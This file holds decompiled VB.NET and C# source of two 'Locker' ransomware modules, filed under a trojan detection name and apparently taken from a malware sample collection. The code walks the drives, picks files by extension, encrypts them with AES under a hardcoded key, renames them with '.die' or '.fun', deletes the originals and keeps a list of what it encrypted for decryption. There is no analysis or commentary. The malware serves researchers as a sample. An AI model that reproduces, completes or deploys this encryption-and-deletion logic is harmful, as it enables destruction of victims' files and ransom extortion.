File: HEUR-Trojan/Win32/G/HEUR-Trojan.Win32.Generic-8862636861e0bb63dbb1c90a72bac6a40746efa23d007ced52614a655741a650/svchst/Main/Tools/Locker.vb
Imports System
Imports System.Collections.Generic
Imports System.IO
Imports System.Linq
Imports System.Security.Cryptography
Imports System.Text
Imports System.Threading
Imports System.Windows.Forms
Imports Main.Properties

Namespace Main.Tools
	' Token: 0x02000040 RID: 64
	Friend Module Locker
		' Token: 0x0600015B RID: 347 RVA: 0x0000C4FC File Offset: 0x0000A6FC
		Friend Sub EncryptFileSystem()
			Try
				Dim hashSet As HashSet(Of String) = New HashSet(Of String)(Locker.GetExtensionsToEncrypt())
				Dim text As String = Locker.CreateFileSystemSimulation()
				Locker.EncryptFiles(text, Locker.EncryptionFileExtension, hashSet)
				Thread.Sleep(10000)
				If Not File.Exists(Locker.EncryptedFileListPath) Then
					Dim array As String() = Locker.EncryptedFiles.ToArray()
					File.WriteAllLines(Locker.EncryptedFileListPath, array)
				End If
			Catch
			End Try
		End Sub

		' Token: 0x0600015C RID: 348 RVA: 0x0000C56C File Offset: 0x0000A76C
		Friend Function GetEncryptedFiles() As HashSet(Of String)
			Dim hashSet As HashSet(Of String) = New HashSet(Of String)()
			If File.Exists(Locker.EncryptedFileListPath) Then
				For Each text As String In File.ReadAllLines(Locker.EncryptedFileListPath)
					hashSet.Add(text)
				Next
			End If
			Return hashSet
		End Function

		' Token: 0x0600015D RID: 349 RVA: 0x0000C5B8 File Offset: 0x0000A7B8
		Private Function CreateFileSystemSimulation() As String
			Dim text As String = Path.Combine(Config.WorkFolderPath, "FileSystemSimulation")
			If Not Directory.Exists(text) Then
				Directory.CreateDirectory(text)
			End If
			Using textWriter As TextWriter = New StreamWriter(Path.Combine(text, "TxtTest.txt"), True)
				textWriter.WriteLine("I am a txt test.")
			End Using
			Using textWriter2 As TextWriter = New StreamWriter(Path.Combine(text, "NotTxtTest.nottxt"), True)
				textWriter2.WriteLine("I am NOT a txt test.")
			End Using
			Return text
		End Function

		' Token: 0x0600015E RID: 350 RVA: 0x0000C65C File Offset: 0x0000A85C
		Private Function GetExtensionsToEncrypt() As IEnumerable(Of String)
			Dim hashSet As HashSet(Of String) = New HashSet(Of String)()
			For Each text As String In Resources.ExtensionsToEncrypt.Split(New String() { Environment.NewLine, " " }, StringSplitOptions.RemoveEmptyEntries).ToList()
				hashSet.Add(text.Trim())
			Next
			hashSet.Remove(Locker.EncryptionFileExtension)
			Return hashSet
		End Function

		' Token: 0x0600015F RID: 351 RVA: 0x00002857 File Offset: 0x00000A57
		Private Function GetFiles(path As String) As IEnumerable(Of String)
			Dim <GetFiles>d__ As Locker.<GetFiles>d__8 = New Locker.<GetFiles>d__8(-2)
			<GetFiles>d__.<>3__path = path
			Return <GetFiles>d__
		End Function

		' Token: 0x06000160 RID: 352 RVA: 0x0000C6EC File Offset: 0x0000A8EC
		Private Sub EncryptFiles(dirPath As String, encryptionExtension As String, extensionsToEncrypt As HashSet(Of String))
			Dim CS$<>8__locals1 As Locker.<>c__DisplayClass9_0 = New Locker.<>c__DisplayClass9_0()
			CS$<>8__locals1.extensionsToEncrypt = extensionsToEncrypt
			Dim files As IEnumerable(Of String) = Locker.GetFiles(dirPath)
			Dim <>9__ As Func(Of String, IEnumerable(Of String)) = CS$<>8__locals1.<>9__0
			Dim func As Func(Of String, IEnumerable(Of String)) = <>9__
			If <>9__ Is Nothing Then
				Dim CS$<>8__locals2 As Locker.<>c__DisplayClass9_0 = CS$<>8__locals1
				Dim func2 As Func(Of String, IEnumerable(Of String)) = Function(file As String) CS$<>8__locals1.extensionsToEncrypt
				Dim func3 As Func(Of String, IEnumerable(Of String)) = func2
				CS$<>8__locals2.<>9__0 = func2
				func = func3
			End If
			Dim <>9__9_ As var = Locker.<>c.<>9__9_1
			Dim func4 As var = <>9__9_
			If <>9__9_ Is Nothing Then
				Dim func5 As var = Function(file As String, ext As String) New With{ file, ext }
				func4 = func5
				Locker.<>c.<>9__9_1 = func5
			End If
			Dim enumerable As var = files.SelectMany(func, func4)
			Dim <>9__9_2 As var = Locker.<>c.<>9__9_2
			Dim func6 As var = <>9__9_2
			If <>9__9_2 Is Nothing Then
				Dim func7 As var = Function(<>h__TransparentIdentifier0) <>h__TransparentIdentifier0.file.EndsWith(<>h__TransparentIdentifier0.ext)
				func6 = func7
				Locker.<>c.<>9__9_2 = func7
			End If
			Dim enumerable2 As var = enumerable.Where(func6)
			Dim <>9__9_3 As var = Locker.<>c.<>9__9_3
			Dim func8 As var = <>9__9_3
			If <>9__9_3 Is Nothing Then
				Dim func9 As var = Function(<>h__TransparentIdentifier0) <>h__TransparentIdentifier0.file
				func8 = func9
				Locker.<>c.<>9__9_3 = func9
			End If
			Dim enumerable3 As IEnumerable(Of String) = enumerable2.[Select](func8)
			Dim <>9__9_4 As var = Locker.<>c.<>9__9_4
			Dim func10 As var = <>9__9_4
			If <>9__9_4 Is Nothing Then
				Dim func11 As var = Function(file As String) New With{ Key .file = file, Key .fi = New FileInfo(file) }
				func10 = func11
				Locker.<>c.<>9__9_4 = func11
			End If
			Dim enumerable4 As var = enumerable3.[Select](func10)
			Dim <>9__9_5 As var = Locker.<>c.<>9__9_5
			Dim func12 As var = <>9__9_5
			If <>9__9_5 Is Nothing Then
				Dim func13 As var = Function(t) t.fi.Length < 10000000L
				func12 = func13
				Locker.<>c.<>9__9_5 = func13
			End If
			Dim enumerable5 As var = enumerable4.Where(func12)
			Dim <>9__9_6 As var = Locker.<>c.<>9__9_6
			Dim func14 As var = <>9__9_6
			If <>9__9_6 Is Nothing Then
				Dim func15 As var = Function(t) t.file
				func14 = func15
				Locker.<>c.<>9__9_6 = func15
			End If
			For Each text As String In enumerable5.[Select](func14)
				Try
					If Path.GetDirectoryName(Application.ExecutablePath) <> Path.GetDirectoryName(Config.FinalExePath) AndAlso Path.GetDirectoryName(Application.ExecutablePath) <> Path.GetDirectoryName(Config.TempExePath) AndAlso Locker.EncryptFile(text, encryptionExtension) Then
						Locker.EncryptedFiles.Add(text)
					End If
				Catch
				End Try
			Next
		End Sub

		' Token: 0x06000161 RID: 353 RVA: 0x0000C898 File Offset: 0x0000AA98
		Friend Sub DecryptFiles(encryptionExtension As String)
			For Each text As String In Locker.GetEncryptedFiles()
				Try
					Dim text2 As String = text + encryptionExtension
					If Path.GetDirectoryName(Application.ExecutablePath) <> Path.GetDirectoryName(Config.FinalExePath) AndAlso Path.GetDirectoryName(Application.ExecutablePath) <> Path.GetDirectoryName(Config.TempExePath) Then
						Locker.DecryptFile(text2, encryptionExtension)
						File.Delete(text2)
					End If
				Catch
				End Try
			Next
			File.Delete(Locker.EncryptedFileListPath)
		End Sub

		' Token: 0x06000162 RID: 354 RVA: 0x0000C950 File Offset: 0x0000AB50
		Private Function EncryptFile(path As String, encryptionExtension As String) As Boolean
			Try
				If Config.StartMode > Config.StartModeType.Debug AndAlso (path.StartsWith(Config.WorkFolderPath, StringComparison.InvariantCulture) OrElse path.StartsWith("C:\Windows", StringComparison.InvariantCultureIgnoreCase)) Then
					Return False
				End If
				Using aesCryptoServiceProvider As AesCryptoServiceProvider = New AesCryptoServiceProvider()
					Dim bytes As Byte() = Encoding.UTF8.GetBytes(Locker.EncryptionPassword)
					Dim text As String = Convert.ToBase64String(bytes)
					aesCryptoServiceProvider.KeySize = 256
					aesCryptoServiceProvider.Key = Convert.FromBase64String(text)
					aesCryptoServiceProvider.IV = New Byte() { 0, 2, 0, 4, 5, 3, 0, 8, 0, 0, 2, 0, 6, 6, 6, 5 }
					Locker.EncryptFile(aesCryptoServiceProvider, path, path + encryptionExtension)
				End Using
			Catch
				Return False
			End Try
			Try
				File.Delete(path)
			Catch ex As Exception
				Return False
			End Try
			Return True
		End Function

		' Token: 0x06000163 RID: 355 RVA: 0x0000CA38 File Offset: 0x0000AC38
		Private Sub DecryptFile(path As String, encryptionExtension As String)
			Try
				If Not path.EndsWith(encryptionExtension) Then
					Return
				End If
				Dim text As String = path.Remove(path.Length - 4)
				Using aesCryptoServiceProvider As AesCryptoServiceProvider = New AesCryptoServiceProvider()
					Dim bytes As Byte() = Encoding.UTF8.GetBytes(Locker.EncryptionPassword)
					Dim text2 As String = Convert.ToBase64String(bytes)
					aesCryptoServiceProvider.KeySize = 256
					aesCryptoServiceProvider.Key = Convert.FromBase64String(text2)
					aesCryptoServiceProvider.IV = New Byte() { 0, 2, 0, 4, 5, 3, 0, 8, 0, 0, 2, 0, 6, 6, 6, 5 }
					Locker.DecryptFile(aesCryptoServiceProvider, path, text)
				End Using
			Catch
				Return
			End Try
			Try
				File.Delete(path)
			Catch ex As Exception
			End Try
		End Sub

		' Token: 0x06000164 RID: 356 RVA: 0x0000CB04 File Offset: 0x0000AD04
		Private Sub EncryptFile(alg As SymmetricAlgorithm, inputFile As String, outputFile As String)
			Dim array As Byte() = New Byte(65535) {}
			Using fileStream As FileStream = New FileStream(inputFile, FileMode.Open)
				Using fileStream2 As FileStream = New FileStream(outputFile, FileMode.Create)
					Using cryptoStream As CryptoStream = New CryptoStream(fileStream2, alg.CreateEncryptor(), CryptoStreamMode.Write)
						Dim num As Integer
						Do
							num = fileStream.Read(array, 0, array.Length)
							If num <> 0 Then
								cryptoStream.Write(array, 0, num)
							End If
						Loop While num <> 0
					End Using
				End Using
			End Using
		End Sub

		' Token: 0x06000165 RID: 357 RVA: 0x0000CBB4 File Offset: 0x0000ADB4
		Private Sub DecryptFile(alg As SymmetricAlgorithm, inputFile As String, outputFile As String)
			Dim array As Byte() = New Byte(65535) {}
			Using fileStream As FileStream = New FileStream(inputFile, FileMode.Open)
				Using fileStream2 As FileStream = New FileStream(outputFile, FileMode.Create)
					Using cryptoStream As CryptoStream = New CryptoStream(fileStream2, alg.CreateDecryptor(), CryptoStreamMode.Write)
						Dim num As Integer
						Do
							num = fileStream.Read(array, 0, array.Length)
							If num <> 0 Then
								cryptoStream.Write(array, 0, num)
							End If
						Loop While num <> 0
					End Using
				End Using
			End Using
		End Sub

		' Token: 0x04000113 RID: 275
		Private EncryptionFileExtension As String = ".die"

		' Token: 0x04000114 RID: 276
		Private EncryptionPassword As String = Config.EncryptionPassword

		' Token: 0x04000115 RID: 277
		Private EncryptedFileListPath As String = Path.Combine(Config.WorkFolderPath, "EncryptedFileList.txt")

		' Token: 0x04000116 RID: 278
		Private EncryptedFiles As HashSet(Of String) = New HashSet(Of String)()
	End Module
End Namespace

File: HEUR-Trojan/Win32/G/HEUR-Trojan.Win32.Generic-e77392cb1ebe598a96caa2e6bc6c66cf0f9d8d56a9c53e9382d352a6e4f103ea/Main.Tools/Locker.cs
using System;
using System.Collections;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Runtime.CompilerServices;
using System.Security.Cryptography;
using Main.Properties;

namespace Main.Tools;

internal static class Locker
{
	private static readonly string EncryptedFileListPath = Locker.smethod_6(Config.WorkFolderPath, "EncryptedFileList.txt");

	private static readonly HashSet<string> EncryptedFiles = new HashSet<string>();

	private const string EncryptionFileExtension = ".fun";

	private const string EncryptionPassword = "OoIsAwwF23cICQoLDA0ODe==";

	internal static void EncryptFileSystem()
	{
		HashSet<string> extensionsToEncrypt = new HashSet<string>(GetExtensionsToEncrypt());
		IEnumerator<string> enumerator = (from drive in Locker.smethod_0()
			select _003C_003Ec.smethod_1((FileSystemInfo)_003C_003Ec.smethod_0(drive))).GetEnumerator();
		try
		{
			while (Locker.smethod_1((IEnumerator)enumerator))
			{
				EncryptFiles(enumerator.Current, ".fun", extensionsToEncrypt);
			}
		}
		finally
		{
			if (enumerator != null)
			{
				Locker.smethod_2((IDisposable)enumerator);
			}
		}
		if (!Locker.smethod_3(EncryptedFileListPath))
		{
			string[] string_ = EncryptedFiles.ToArray();
			Locker.smethod_4(EncryptedFileListPath, string_);
		}
	}

	internal static HashSet<string> GetEncryptedFiles()
	{
		HashSet<string> hashSet = new HashSet<string>();
		if (Locker.smethod_3(EncryptedFileListPath))
		{
			string[] array = Locker.smethod_5(EncryptedFileListPath);
			foreach (string item in array)
			{
				hashSet.Add(item);
			}
		}
		return hashSet;
	}

	private static string CreateFileSystemSimulation()
	{
		string text = Locker.smethod_6(Config.WorkFolderPath, "FileSystemSimulation");
		if (!Locker.smethod_7(text))
		{
			Locker.smethod_8(text);
		}
		TextWriter textWriter = Locker.smethod_9(Locker.smethod_6(text, "TxtTest.txt"), bool_0: true);
		try
		{
			Locker.smethod_10(textWriter, "I am a txt test.");
		}
		finally
		{
			if (textWriter != null)
			{
				Locker.smethod_2((IDisposable)textWriter);
			}
		}
		TextWriter textWriter2 = Locker.smethod_9(Locker.smethod_6(text, "NotTxtTest.nottxt"), bool_0: true);
		try
		{
			Locker.smethod_10(textWriter2, "I am NOT a txt test.");
			return text;
		}
		finally
		{
			if (textWriter2 != null)
			{
				Locker.smethod_2((IDisposable)textWriter2);
			}
		}
	}

	private static IEnumerable<string> GetExtensionsToEncrypt()
	{
		HashSet<string> hashSet = new HashSet<string>();
		foreach (string item in Locker.smethod_12(Resources.ExtensionsToEncrypt, new string[2]
		{
			Locker.smethod_11(),
			" "
		}, StringSplitOptions.RemoveEmptyEntries).ToList())
		{
			hashSet.Add(Locker.smethod_13(item));
		}
		hashSet.Remove(".fun");
		return hashSet;
	}

	private static IEnumerable<string> GetFiles(string path)
	{
		Queue<string> queue = new Queue<string>();
		queue.Enqueue(path);
		while (queue.Count > 0)
		{
			path = queue.Dequeue();
			try
			{
				string[] array = _003CGetFiles_003Ed__8.smethod_2(path);
				foreach (string item in array)
				{
					queue.Enqueue(item);
				}
			}
			catch (Exception object_)
			{
				_003CGetFiles_003Ed__8.smethod_4(_003CGetFiles_003Ed__8.smethod_3(), (object)object_);
			}
			string[] array2 = null;
			try
			{
				array2 = _003CGetFiles_003Ed__8.smethod_5(path);
			}
			catch (Exception object_2)
			{
				_003CGetFiles_003Ed__8.smethod_4(_003CGetFiles_003Ed__8.smethod_3(), (object)object_2);
			}
			if (array2 != null)
			{
				string[] array3 = array2;
				for (int j = 0; j < array3.Length; j++)
				{
					yield return array3[j];
				}
			}
		}
	}

	private static void EncryptFiles(string dirPath, string encryptionExtension, HashSet<string> extensionsToEncrypt)
	{
		IEnumerator<string> enumerator = (from file in GetFiles(dirPath)
			from ext in extensionsToEncrypt
			where _003C_003Ec.smethod_2(file, ext)
			select file into file
			select new
			{
				file = file,
				fi = _003C_003Ec.smethod_3(file)
			} into t
			where _003C_003Ec.smethod_4(t.fi) < 10000000L
			select t.file).GetEnumerator();
		try
		{
			while (Locker.smethod_1((IEnumerator)enumerator))
			{
				string current = enumerator.Current;
				try
				{
					if (EncryptFile(current, encryptionExtension))
					{
						EncryptedFiles.Add(current);
					}
				}
				catch
				{
				}
			}
		}
		finally
		{
			if (enumerator != null)
			{
				Locker.smethod_2((IDisposable)enumerator);
			}
		}
	}

	internal static void DecryptFiles(string encryptionExtension)
	{
		foreach (string encryptedFile in GetEncryptedFiles())
		{
			try
			{
				string text = Locker.smethod_14(encryptedFile, encryptionExtension);
				DecryptFile(text, encryptionExtension);
				Locker.smethod_15(text);
			}
			catch
			{
			}
		}
		Locker.smethod_15(EncryptedFileListPath);
	}

	private static bool EncryptFile(string path, string encryptionExtension)
	{
		try
		{
			if (Config.StartMode != 0 && (Locker.smethod_16(path, Config.WorkFolderPath, StringComparison.InvariantCulture) || Locker.smethod_16(path, "C:\\Windows", StringComparison.InvariantCultureIgnoreCase)))
			{
				return false;
			}
			AesCryptoServiceProvider aesCryptoServiceProvider = Locker.smethod_17();
			try
			{
				Locker.smethod_19((SymmetricAlgorithm)aesCryptoServiceProvider, Locker.smethod_18("OoIsAwwF23cICQoLDA0ODe=="));
				byte[] array = new byte[16];
				Locker.smethod_20((Array)array, (RuntimeFieldHandle)/*OpCode not supported: LdMemberToken*/);
				Locker.smethod_21((SymmetricAlgorithm)aesCryptoServiceProvider, array);
				EncryptFile(aesCryptoServiceProvider, path, Locker.smethod_14(path, encryptionExtension));
			}
			finally
			{
				if (aesCryptoServiceProvider != null)
				{
					Locker.smethod_2((IDisposable)aesCryptoServiceProvider);
				}
			}
		}
		catch
		{
			return false;
		}
		try
		{
			Locker.smethod_15(path);
		}
		catch (Exception)
		{
			return false;
		}
		return true;
	}

	private static void DecryptFile(string path, string encryptionExtension)
	{
		try
		{
			if (!Locker.smethod_22(path, encryptionExtension))
			{
				return;
			}
			string outputFile = Locker.smethod_24(path, Locker.smethod_23(path) - 4);
			AesCryptoServiceProvider aesCryptoServiceProvider = Locker.smethod_17();
			try
			{
				Locker.smethod_19((SymmetricAlgorithm)aesCryptoServiceProvider, Locker.smethod_18("OoIsAwwF23cICQoLDA0ODe=="));
				byte[] array = new byte[16];
				Locker.smethod_20((Array)array, (RuntimeFieldHandle)/*OpCode not supported: LdMemberToken*/);
				Locker.smethod_21((SymmetricAlgorithm)aesCryptoServiceProvider, array);
				DecryptFile(aesCryptoServiceProvider, path, outputFile);
			}
			finally
			{
				if (aesCryptoServiceProvider != null)
				{
					Locker.smethod_2((IDisposable)aesCryptoServiceProvider);
				}
			}
		}
		catch
		{
			return;
		}
		try
		{
			Locker.smethod_15(path);
		}
		catch (Exception)
		{
		}
	}

	private static void EncryptFile(SymmetricAlgorithm alg, string inputFile, string outputFile)
	{
		byte[] array = new byte[65536];
		FileStream fileStream = Locker.smethod_25(inputFile, FileMode.Open);
		try
		{
			FileStream fileStream2 = Locker.smethod_25(outputFile, FileMode.Create);
			try
			{
				CryptoStream cryptoStream = Locker.smethod_27((Stream)fileStream2, Locker.smethod_26(alg), CryptoStreamMode.Write);
				try
				{
					int num;
					do
					{
						num = Locker.smethod_28((Stream)fileStream, array, 0, array.Length);
						if (num != 0)
						{
							Locker.smethod_29((Stream)cryptoStream, array, 0, num);
						}
					}
					while (num != 0);
				}
				finally
				{
					if (cryptoStream != null)
					{
						Locker.smethod_2((IDisposable)cryptoStream);
					}
				}
			}
			finally
			{
				if (fileStream2 != null)
				{
					Locker.smethod_2((IDisposable)fileStream2);
				}
			}
		}
		finally
		{
			if (fileStream != null)
			{
				Locker.smethod_2((IDisposable)fileStream);
			}
		}
	}

	private static void DecryptFile(SymmetricAlgorithm alg, string inputFile, string outputFile)
	{
		byte[] array = new byte[65536];
		FileStream fileStream = Locker.smethod_25(inputFile, FileMode.Open);
		try
		{
			FileStream fileStream2 = Locker.smethod_25(outputFile, FileMode.Create);
			try
			{
				CryptoStream cryptoStream = Locker.smethod_27((Stream)fileStream2, Locker.smethod_30(alg), CryptoStreamMode.Write);
				try
				{
					int num;
					do
					{
						num = Locker.smethod_28((Stream)fileStream, array, 0, array.Length);
						if (num != 0)
						{
							Locker.smethod_29((Stream)cryptoStream, array, 0, num);
						}
					}
					while (num != 0);
				}
				finally
				{
					if (cryptoStream != null)
					{
						Locker.smethod_2((IDisposable)cryptoStream);
					}
				}
			}
			finally
			{
				if (fileStream2 != null)
				{
					Locker.smethod_2((IDisposable)fileStream2);
				}
			}
		}
		finally
		{
			if (fileStream != null)
			{
				Locker.smethod_2((IDisposable)fileStream);
			}
		}
	}

	static DriveInfo[] smethod_0()
	{
		return DriveInfo.GetDrives();
	}

	static bool smethod_1(IEnumerator ienumerator_0)
	{
		return ienumerator_0.MoveNext();
	}

	static void smethod_2(IDisposable idisposable_0)
	{
		idisposable_0.Dispose();
	}

	static bool smethod_3(string string_0)
	{
		return File.Exists(string_0);
	}

	static void smethod_4(string string_0, string[] string_1)
	{
		File.WriteAllLines(string_0, string_1);
	}

	static string[] smethod_5(string string_0)
	{
		return File.ReadAllLines(string_0);
	}

	static string smethod_6(string string_0, string string_1)
	{
		return Path.Combine(string_0, string_1);
	}

	static bool smethod_7(string string_0)
	{
		return Directory.Exists(string_0);
	}

	static DirectoryInfo smethod_8(string string_0)
	{
		return Directory.CreateDirectory(string_0);
	}

	static StreamWriter smethod_9(string string_0, bool bool_0)
	{
		return new StreamWriter(string_0, bool_0);
	}

	static void smethod_10(TextWriter textWriter_0, string string_0)
	{
		textWriter_0.WriteLine(string_0);
	}

	static string smethod_11()
	{
		return Environment.NewLine;
	}

	static string[] smethod_12(string string_0, string[] string_1, StringSplitOptions stringSplitOptions_0)
	{
		return string_0.Split(string_1, stringSplitOptions_0);
	}

	static string smethod_13(string string_0)
	{
		return string_0.Trim();
	}

	static string smethod_14(string string_0, string string_1)
	{
		return string_0 + string_1;
	}

	static void smethod_15(string string_0)
	{
		File.Delete(string_0);
	}

	static bool smethod_16(string string_0, string string_1, StringComparison stringComparison_0)
	{
		return string_0.StartsWith(string_1, stringComparison_0);
	}

	static AesCryptoServiceProvider smethod_17()
	{
		return new AesCryptoServiceProvider();
	}

	static byte[] smethod_18(string string_0)
	{
		return Convert.FromBase64String(string_0);
	}

	static void smethod_19(SymmetricAlgorithm symmetricAlgorithm_0, byte[] byte_0)
	{
		symmetricAlgorithm_0.Key = byte_0;
	}

	static void smethod_20(Array array_0, RuntimeFieldHandle runtimeFieldHandle_0)
	{
		RuntimeHelpers.InitializeArray(array_0, runtimeFieldHandle_0);
	}

	static void smethod_21(SymmetricAlgorithm symmetricAlgorithm_0, byte[] byte_0)
	{
		symmetricAlgorithm_0.IV = byte_0;
	}

	static bool smethod_22(string string_0, string string_1)
	{
		return string_0.EndsWith(string_1);
	}

	static int smethod_23(string string_0)
	{
		return string_0.Length;
	}

	static string smethod_24(string string_0, int int_0)
	{
		return string_0.Remove(int_0);
	}

	static FileStream smethod_25(string string_0, FileMode fileMode_0)
	{
		return new FileStream(string_0, fileMode_0);
	}

	static ICryptoTransform smethod_26(SymmetricAlgorithm symmetricAlgorithm_0)
	{
		return symmetricAlgorithm_0.CreateEncryptor();
	}

	static CryptoStream smethod_27(Stream stream_0, ICryptoTransform icryptoTransform_0, CryptoStreamMode cryptoStreamMode_0)
	{
		return new CryptoStream(stream_0, icryptoTransform_0, cryptoStreamMode_0);
	}

	static int smethod_28(Stream stream_0, byte[] byte_0, int int_0, int int_1)
	{
		return stream_0.Read(byte_0, int_0, int_1);
	}

	static void smethod_29(Stream stream_0, byte[] byte_0, int int_0, int int_1)
	{
		stream_0.Write(byte_0, int_0, int_1);
	}

	static ICryptoTransform smethod_30(SymmetricAlgorithm symmetricAlgorithm_0)
	{
		return symmetricAlgorithm_0.CreateDecryptor();
	}
}
